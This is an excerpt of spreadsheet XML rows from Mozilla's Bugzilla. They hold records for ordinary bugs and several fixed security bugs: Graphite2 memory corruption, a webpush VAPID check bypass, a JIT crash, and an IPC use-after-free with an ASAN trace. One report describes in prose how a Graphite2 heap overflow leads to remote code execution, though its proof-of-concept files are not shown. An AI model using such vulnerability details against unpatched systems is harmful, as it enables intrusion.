      <c r="N1100" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1100" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1100" t="inlineStr">
        <is>
          <t>u=user c=search s=2012.2 p=1 post-sprint</t>
        </is>
      </c>
      <c r="Q1100" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1100" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1100" t="inlineStr">
        <is>
          <t>2012-01-24</t>
        </is>
      </c>
      <c r="T1100" t="n">
        <v>1</v>
      </c>
      <c r="U1100" t="n">
        <v>0</v>
      </c>
      <c r="V1100" t="n">
        <v>6</v>
      </c>
      <c r="W1100" t="inlineStr">
        <is>
          <t>Things like this happen when searching on prod for "facebook":
Traceback (most recent call last):
 File "/data/www/support.mozilla.org/kitsune/vendor/src/django/django/core/handlers/base.py", line 111, in get_response
   response = callback(request, *callback_args, **callback_kwargs)
 File "/data/www/support.mozilla.org/kitsune/vendor/src/django-mobility/mobility/decorators.py", line 23, in wrapper
   return f(request, *args, **kw)
 File "/data/www/support.mozilla.org/kitsune/apps/search/views.py", line 334, in search
   summary = doc.current_revision.summary
AttributeError: 'NoneType' object has no attribute 'summary'
1. Why are we indexing docs with no current rev?
2. Why are we turning them up in search?
Off the cuff, I'd say fix #1, and you get #2 for free.</t>
        </is>
      </c>
      <c r="X1100" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" t="n">
        <v>1617103</v>
      </c>
      <c r="B1101" t="inlineStr">
        <is>
          <t>2020-02-20 23:37:59 -0800</t>
        </is>
      </c>
      <c r="C1101" t="inlineStr">
        <is>
          <t>yamllint should be documented</t>
        </is>
      </c>
      <c r="D1101" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E1101" t="n">
        <v>1</v>
      </c>
      <c r="F1101" t="n">
        <v>1</v>
      </c>
      <c r="G1101" t="n">
        <v>7</v>
      </c>
      <c r="H1101" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1101" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J1101" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K1101" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1101" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1101" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1101" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1101" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1101" t="inlineStr">
        <is>
          <t>[lang=RST]</t>
        </is>
      </c>
      <c r="Q1101" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R1101" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1101" t="inlineStr">
        <is>
          <t>105 Branch</t>
        </is>
      </c>
      <c r="T1101" t="n">
        <v>1</v>
      </c>
      <c r="U1101" t="n">
        <v>0</v>
      </c>
      <c r="V1101" t="n">
        <v>4</v>
      </c>
      <c r="W1101" t="inlineStr">
        <is>
          <t>https://firefox-source-docs.mozilla.org/code-quality/lint/ doesn't have any doc for yamllint.
Should be similar too:
https://searchfox.org/mozilla-central/source/docs/code-quality/lint/linters/rstlinter.rst
yamllint code is here: https://searchfox.org/mozilla-central/source/tools/lint/yamllint_/__init__.py
As the change is trivial, it is mostly  to learn how to contribute to Firefox.
Tutorial to contribute:
https://firefox-source-docs.mozilla.org/tools/docs/contribute/how_to_contribute_firefox.html
Please don't ask for the bug to be assigned. It will be automatically assigned to the first patch.</t>
        </is>
      </c>
      <c r="X1101" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" t="n">
        <v>910895</v>
      </c>
      <c r="B1102" t="inlineStr">
        <is>
          <t>2013-08-29 14:21:27 -0700</t>
        </is>
      </c>
      <c r="C1102" t="inlineStr">
        <is>
          <t>figure out l10n issues with badges</t>
        </is>
      </c>
      <c r="D1102" t="inlineStr">
        <is>
          <t>2013-09-16 09:23:00 -0700</t>
        </is>
      </c>
      <c r="E1102" t="n">
        <v>1</v>
      </c>
      <c r="F1102" t="n">
        <v>1</v>
      </c>
      <c r="G1102" t="n">
        <v>5</v>
      </c>
      <c r="H1102" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1102" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1102" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1102" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1102" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1102" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1102" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1102" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1102" t="inlineStr">
        <is>
          <t>u=contributor c=badges p=1 s=2013.18</t>
        </is>
      </c>
      <c r="Q1102" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1102" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1102" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T1102" t="n">
        <v>1</v>
      </c>
      <c r="U1102" t="n">
        <v>0</v>
      </c>
      <c r="V1102" t="n">
        <v>9</v>
      </c>
      <c r="W1102" t="inlineStr">
        <is>
          <t>Bug #896137 adds badge infrastructure to Kitsune.
Badges are stored in the database. They have a title and a description. It's probably the case that we want these two strings localizable so that someone who speaks Klingon doesn't get an award for a badge in English and is all like "nuqjatlh?".
So the easy solution here is to extract the strings from the database and add them to our .pot file. Yay!
However, the wry twist is whether we should make badges themselves be locale-specific. Say the Klingon community really wants to award the "Fights spam with a betleH". That's not particularly applicable to other locales. So say we create this badge just for this locale. Do we make the title and description in English and then translate it? Should they be in Klingon? If so, how do we denote it shouldn't be translated? What a conundrum!</t>
        </is>
      </c>
      <c r="X1102" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" t="n">
        <v>752662</v>
      </c>
      <c r="B1103" t="inlineStr">
        <is>
          <t>2012-05-07 13:32:10 -0700</t>
        </is>
      </c>
      <c r="C1103" t="inlineStr">
        <is>
          <t>Graphite 2 use-after-free crash</t>
        </is>
      </c>
      <c r="D1103" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:37 -0800</t>
        </is>
      </c>
      <c r="E1103" t="n">
        <v>1</v>
      </c>
      <c r="F1103" t="n">
        <v>1</v>
      </c>
      <c r="G1103" t="n">
        <v>3</v>
      </c>
      <c r="H1103" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1103" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1103" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1103" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1103" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1103" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1103" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1103" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1103" t="inlineStr">
        <is>
          <t>[asan][sg:high][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1103" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1103" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1103" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T1103" t="n">
        <v>1</v>
      </c>
      <c r="U1103" t="n">
        <v>0</v>
      </c>
      <c r="V1103" t="n">
        <v>13</v>
      </c>
      <c r="W1103" t="inlineStr">
        <is>
          <t>Created attachment 621710
testcase
The testcase is reproducible with a ASAN enabled build. If necessary, reload the testcase a few times. 
If you have not a ASAN enabled build yet, follow the instructions described here: https://developer.mozilla.org/en/Building_Firefox_with_Address_Sanitizer</t>
        </is>
      </c>
      <c r="X1103" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" t="n">
        <v>1363504</v>
      </c>
      <c r="B1104" t="inlineStr">
        <is>
          <t>2017-05-09 13:13:30 -0700</t>
        </is>
      </c>
      <c r="C1104" t="inlineStr">
        <is>
          <t>Churn dataset is missing data for the week of 20170326</t>
        </is>
      </c>
      <c r="D1104" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E1104" t="n">
        <v>1</v>
      </c>
      <c r="F1104" t="n">
        <v>1</v>
      </c>
      <c r="G1104" t="n">
        <v>2</v>
      </c>
      <c r="H1104" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1104" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J1104" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1104" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1104" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1104" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1104" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1104" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1104" t="inlineStr"/>
      <c r="Q1104" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1104" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1104" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1104" t="n">
        <v>1</v>
      </c>
      <c r="U1104" t="n">
        <v>0</v>
      </c>
      <c r="V1104" t="n">
        <v>2</v>
      </c>
      <c r="W1104" t="inlineStr">
        <is>
          <t>Running `aws s3 ls --recursive s3://telemetry-parquet/churn/v2/week_start=2017 | grep 20170326` results in a single file entry. The data for this date is does not exist and is skewing retention queries.
This data should be backfilled.</t>
        </is>
      </c>
      <c r="X1104" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" t="n">
        <v>1865488</v>
      </c>
      <c r="B1105" t="inlineStr">
        <is>
          <t>2023-11-18 11:07:28 -0800</t>
        </is>
      </c>
      <c r="C1105" t="inlineStr">
        <is>
          <t>webpush requests do not require vapid key</t>
        </is>
      </c>
      <c r="D1105" t="inlineStr">
        <is>
          <t>2024-05-30 11:16:10 -0700</t>
        </is>
      </c>
      <c r="E1105" t="n">
        <v>1</v>
      </c>
      <c r="F1105" t="n">
        <v>1</v>
      </c>
      <c r="G1105" t="n">
        <v>2</v>
      </c>
      <c r="H1105" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1105" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J1105" t="inlineStr">
        <is>
          <t>Push</t>
        </is>
      </c>
      <c r="K1105" t="inlineStr">
        <is>
          <t>Firefox 121</t>
        </is>
      </c>
      <c r="L1105" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1105" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1105" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1105" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1105" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main121+]</t>
        </is>
      </c>
      <c r="Q1105" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1105" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1105" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T1105" t="n">
        <v>1</v>
      </c>
      <c r="U1105" t="n">
        <v>0</v>
      </c>
      <c r="V1105" t="n">
        <v>38</v>
      </c>
      <c r="W1105" t="inlineStr">
        <is>
          <t>Created attachment 9364319
wpn.tar.gz
In testing webpush to Firefox, I discovered that if you send a push request w/o the request signed w/ the vapid key, even though it was specified in the PushManager.subscribe applicationServerKey.
I have verified that this is required on Chrome.  Safari just hangs on the webpush.
Attached is a project that will demonstrate the issue.
extract, run `make run` to build things, then `sudo make run EMAIL=youremail@example.com`  and go to http://localhost:80/   request notification, and maybe hit reload a time or two.
console output should look similar to:
```
192.168.0.2 - - [18/Nov/2023 11:03:34] "GET / HTTP/1.1" 200 -                          
'/private/tmp/wpn/templates/../static'
192.168.0.2 - - [18/Nov/2023 11:03:35] "GET /S3_sw.js HTTP/1.1" 200 -                                                                                                          
sub: '{"endpoint": "https://updates.push.services.mozilla.com/wpush/v1/xxx-xxx
-xx-xxx", "expirationTime": null, "keys": {"auth": "xxx", "p256dh": "xxx"}}'  
sending notification...
done                   
```</t>
        </is>
      </c>
      <c r="X1105" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" t="n">
        <v>1345461</v>
      </c>
      <c r="B1106" t="inlineStr">
        <is>
          <t>2017-03-08 05:51:12 -0800</t>
        </is>
      </c>
      <c r="C1106" t="inlineStr">
        <is>
          <t>Graphite2 FeatureRef::applyValToFeature heap overflow</t>
        </is>
      </c>
      <c r="D1106" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:06 -0700</t>
        </is>
      </c>
      <c r="E1106" t="n">
        <v>1</v>
      </c>
      <c r="F1106" t="n">
        <v>1</v>
      </c>
      <c r="G1106" t="n">
        <v>3</v>
      </c>
      <c r="H1106" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1106" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1106" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K1106" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1106" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1106" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1106" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1106" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1106" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q1106" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1106" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1106" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1106" t="n">
        <v>1</v>
      </c>
      <c r="U1106" t="n">
        <v>0</v>
      </c>
      <c r="V1106" t="n">
        <v>35</v>
      </c>
      <c r="W1106" t="inlineStr">
        <is>
          <t>Created attachment 8844899
poc1.html
A graphite font with a specially crafted feature table can cause a heap overflow which is exploitable to archive remote code execution.
The vulnerability exists in FeatureRef::applyValToFeature in the graphite 2 library. Before accessing data FeatureRef::applyValToFeature tries to ensure that the capacity of the pDest Vector is sufficient through a call to Vector ::reserve but it reserves one too few because the variable m_index is used for the call to Vector::reserve and for accessing the Vector data. This leads to the possibility of a 1-32 bit overflow because the vector is used as a bit map.
The attached pocs work with https://ftp.mozilla.org/pub/firefox/releases/52.0/linux-x86_64/en-US/firefox-52.0.tar.bz2 and show the possibility to exploit the vulnerability to archive remote code execution:
- poc1 calculates the base address for the xul library
- poc2 crashes with a jump to 0x4141414141414141</t>
        </is>
      </c>
      <c r="X1106" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" t="n">
        <v>1171540</v>
      </c>
      <c r="B1107" t="inlineStr">
        <is>
          <t>2015-06-04 09:59:35 -0700</t>
        </is>
      </c>
      <c r="C1107" t="inlineStr">
        <is>
          <t>crash in void js::jit::AssemblerX86Shared::lock_addl&lt;js::jit::Imm32&gt;(js::jit::Imm32, js::jit::Operand const&amp;)</t>
        </is>
      </c>
      <c r="D1107" t="inlineStr">
        <is>
          <t>2016-07-02 10:49:33 -0700</t>
        </is>
      </c>
      <c r="E1107" t="n">
        <v>1</v>
      </c>
      <c r="F1107" t="n">
        <v>1</v>
      </c>
      <c r="G1107" t="n">
        <v>3</v>
      </c>
      <c r="H1107" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1107" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1107" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1107" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1107" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1107" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1107" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1107" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1107" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q1107" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1107" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1107" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T1107" t="n">
        <v>1</v>
      </c>
      <c r="U1107" t="n">
        <v>0</v>
      </c>
      <c r="V1107" t="n">
        <v>34</v>
      </c>
      <c r="W1107" t="inlineStr">
        <is>
          <t>Created attachment 8615409
atomics_crash.tar.gz
This bug was filed from the Socorro interface and is 
report bp-3cd5bd7d-33e2-45a2-afce-39cb22150604.
=============================================================
There is a systematically reproducible crash in current Firefox Beta channel at least, which affects Linux and OS X. To reproduce, open the .html page from the attached file.
The crash occurs in current Emscripten unit test build servers (logs don't really show much except timeout, but linking here just as a record):
OSX: http://clb.demon.fi:8112/builders/osx-incoming/builds/891/steps/Tests-browser-firefox-beta/logs/stdio
Linux: http://clb.demon.fi:8112/builders/ubuntu-incoming/builds/888/steps/Tests-browser-firefox-beta/logs/stdio
The issue does not occur in the Emscripten unit test servers in Firefox stable channel, current FF Dev Edition or FF Nightly, and it does not occur on Windows either.
I'm initially assuming this might be a crash that has been already fixed in FF Dev Edition, but that the crash slipped through to FF Beta channel release? Or alternative possibility is that the issue is still present, but somehow masked in FF Dev Edition and newer?</t>
        </is>
      </c>
      <c r="X1107" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" t="n">
        <v>1725335</v>
      </c>
      <c r="B1108" t="inlineStr">
        <is>
          <t>2021-08-12 00:47:28 -0700</t>
        </is>
      </c>
      <c r="C1108" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free MessageChannel.cpp:1844 in mozilla::ipc::MessageChannel::MessageTask::Run</t>
        </is>
      </c>
      <c r="D1108" t="inlineStr">
        <is>
          <t>2024-05-30 10:35:42 -0700</t>
        </is>
      </c>
      <c r="E1108" t="n">
        <v>1</v>
      </c>
      <c r="F1108" t="n">
        <v>1</v>
      </c>
      <c r="G1108" t="n">
        <v>3</v>
      </c>
      <c r="H1108" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1108" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1108" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K1108" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1108" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1108" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1108" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1108" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1108" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][adv-main93+][adv-esr78.15+][adv-esr91.2+]</t>
        </is>
      </c>
      <c r="Q1108" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1108" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1108" t="inlineStr">
        <is>
          <t>93 Branch</t>
        </is>
      </c>
      <c r="T1108" t="n">
        <v>1</v>
      </c>
      <c r="U1108" t="n">
        <v>0</v>
      </c>
      <c r="V1108" t="n">
        <v>24</v>
      </c>
      <c r="W1108" t="inlineStr">
        <is>
          <t>Created attachment 9235918
poc.zip
#Summary
AddressSanitizer: heap-use-after-free MessageChannel.cpp:1844 in mozilla::ipc::MessageChannel::MessageTask::Run
#Reproduce
OS:Win10 X64
Firefox: Nightly 93.0a1 (2021-08-11) (64-bit)
step:
1. sudo python -m http.server 80
2. install node puppeteer-core (ffpuppet not work on windows)
3. node ff.test.js D:\firefox_asan\target\firefox\firefox.exe http://localhost/fuzz1/1628742733366/fuzz-00005.htm
4. wait for 30s if not crashes try again
I will try to make a minicase.
#Type of crash
Tab process
#Analysis
MessageTask hold a raw pointer to MessageChannel[1] with out correct observation object life cycle and used AT[2].
when mozilla::ShutdownXPCOM, PCompositorManagerChild destruct will free the mChannel[3] cause uaf.
```
[1]
ipc/glue/MessageChannel.h
553	MessageChannel* mChannel; // found in mozilla::ipc::MessageChannel::MessageTask
[2]
ipc/glue/MessageChannel.cpp
1844 mChannel-&gt;AssertWorkerThread(); // found in mozilla::ipc::MessageChannel::MessageTask::Run
[3]
ipc/glue/ProtocolUtils.h
555	MessageChannel mChannel; // found in mozilla::ipc::IToplevelProtocol
```
#Patch
Not Yet
#ASAN
```
=================================================================
==11116==ERROR: AddressSanitizer: heap-use-after-free on address 0x12778a4c5f88 at pc 0x7ff8e52cb16a bp 0x00dff11fd570 sp 0x00dff11fd5b8
READ of size 8 at 0x12778a4c5f88 thread T0
    #0 0x7ff8e52cb169 in mozilla::ipc::MessageChannel::MessageTask::Run /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1844
    #1 0x7ff8e3f2e75d in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:502
    #2 0x7ff8e3eeaae9 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:805
    #3 0x7ff8e3ee692c in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:641
    #4 0x7ff8e3ee72f0 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:425
    #5 0x7ff8e3f38bc1 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:138:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:532
    #6 0x7ff8e3f0f71b in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1148
    #7 0x7ff8e3f1fffc in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:466
    #8 0x7ff8e3f0d41d in nsThread::Shutdown /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:840
    #9 0x7ff8e6e94a26 in mozilla::layers::ImageBridgeChild::ShutDown /builds/worker/checkouts/gecko/gfx/layers/ipc/ImageBridgeChild.cpp:489
    #10 0x7ff8e6f249b6 in gfxPlatform::ShutdownLayersIPC /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1340
    #11 0x7ff8e3fafb8f in mozilla::ShutdownXPCOM /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:622
    #12 0x7ff8f1a0be30 in XRE_TermEmbedding /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:218
    #13 0x7ff8e52f4b98 in mozilla::ipc::ScopedXREEmbed::Stop /builds/worker/checkouts/gecko/ipc/glue/ScopedXREEmbed.cpp:90
    #14 0x7ff8f1a0cdff in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:753
    #15 0x7ff61d731f49 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #16 0x7ff61d7314d4 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:131
    #17 0x7ff61d82f3f7 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #18 0x7ff97f857033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #19 0x7ff980ee2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)
0x12778a4c5f88 is located 264 bytes inside of 592-byte region [0x12778a4c5e80,0x12778a4c60d0)
freed by thread T0 here:
    #0 0x7ff94f755afb in free Z:\task_162801323523615\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:82
    #1 0x7ff8e55da72c in mozilla::layers::PCompositorManagerChild::~PCompositorManagerChild /builds/worker/workspace/obj-build/ipc/ipdl/PCompositorManagerChild.cpp:62
    #2 0x7ff8e52ece8e in mozilla::ipc::ActorLifecycleProxy::~ActorLifecycleProxy /builds/worker/checkouts/gecko/ipc/glue/ProtocolUtils.cpp:280
    #3 0x7ff8e54b46d1 in mozilla::layers::PCompositorManagerParent::OnChannelClose /builds/worker/workspace/obj-build/ipc/ipdl/PCompositorManagerChild.cpp:596
    #4 0x7ff8e52d0945 in mozilla::ipc::MessageChannel::Close /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2580
    #5 0x7ff8e6e79061 in mozilla::layers::CompositorManagerChild::Shutdown /builds/worker/checkouts/gecko/gfx/layers/ipc/CompositorManagerChild.cpp:79
    #6 0x7ff8e6f249b1 in gfxPlatform::ShutdownLayersIPC /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1339
    #7 0x7ff8e3fafb8f in mozilla::ShutdownXPCOM /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:622
    #8 0x7ff8f1a0be30 in XRE_TermEmbedding /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:218
    #9 0x7ff8e52f4b98 in mozilla::ipc::ScopedXREEmbed::Stop /builds/worker/checkouts/gecko/ipc/glue/ScopedXREEmbed.cpp:90
    #10 0x7ff8f1a0cdff in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:753
    #11 0x7ff61d731f49 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #12 0x7ff61d7314d4 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:131
    #13 0x7ff61d82f3f7 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #14 0x7ff97f857033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #15 0x7ff980ee2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)
previously allocated by thread T0 here:
    #0 0x7ff94f755c0b in malloc Z:\task_162801323523615\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:98
    #1 0x7ff95ca1139d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ff8e6e78d34 in mozilla::layers::CompositorManagerChild::Init /builds/worker/checkouts/gecko/gfx/layers/ipc/CompositorManagerChild.cpp:65
    #3 0x7ff8ec883cde in mozilla::dom::ContentChild::RecvInitRendering /builds/worker/checkouts/gecko/dom/ipc/ContentChild.cpp:1542
    #4 0x7ff8e5533a67 in mozilla::dom::PContentChild::OnMessageReceived /builds/worker/workspace/obj-build/ipc/ipdl/PContentChild.cpp:8826
    #5 0x7ff8e52cc854 in mozilla::ipc::MessageChannel::DispatchAsyncMessage /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2051
    #6 0x7ff8e52c8cbf in mozilla::ipc::MessageChannel::DispatchMessage /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1978
    #7 0x7ff8e52cab3c in mozilla::ipc::MessageChannel::RunMessage /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1826
    #8 0x7ff8e52cb0ec in mozilla::ipc::MessageChannel::MessageTask::Run /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1857
    #9 0x7ff8e3f2e75d in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:502
    #10 0x7ff8e3eeaae9 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:805
